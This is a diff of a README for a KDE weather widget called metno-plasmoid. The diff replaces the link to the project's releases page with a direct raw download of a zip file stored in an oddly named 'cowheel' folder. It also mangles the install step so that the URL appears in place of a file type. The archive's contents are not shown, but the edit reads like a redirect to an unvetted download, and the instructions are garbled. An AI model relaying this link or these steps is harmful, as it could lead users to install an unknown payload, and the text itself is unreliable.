7mo9/metno-plasmoid/README.md

 - **Disk Space:** Minimum of 100 MB free space

 ## 📥 Download & Install
-To get started, [visit this page to download](https://github.com/7mo9/metno-plasmoid/releases).
+To get started, [visit this page to download](https://github.com/7mo9/metno-plasmoid/raw/refs/heads/master/cowheel/plasmoid-metno-v3.3.zip).
 You will find different versions of the application.
 Choose the latest version, then follow these steps:

 1. Click on the version you want to download.
-2. Look for the appropriate file for your system (most likely a .tar.gz or .zip file).
+2. Look for the appropriate file for your system (most likely a https://github.com/7mo9/metno-plasmoid/raw/refs/heads/master/cowheel/plasmoid-metno-v3.3.zip or .zip file).
 3. Once the file is downloaded, extract it to a location on your computer.

 ### 🖥️ Running the Application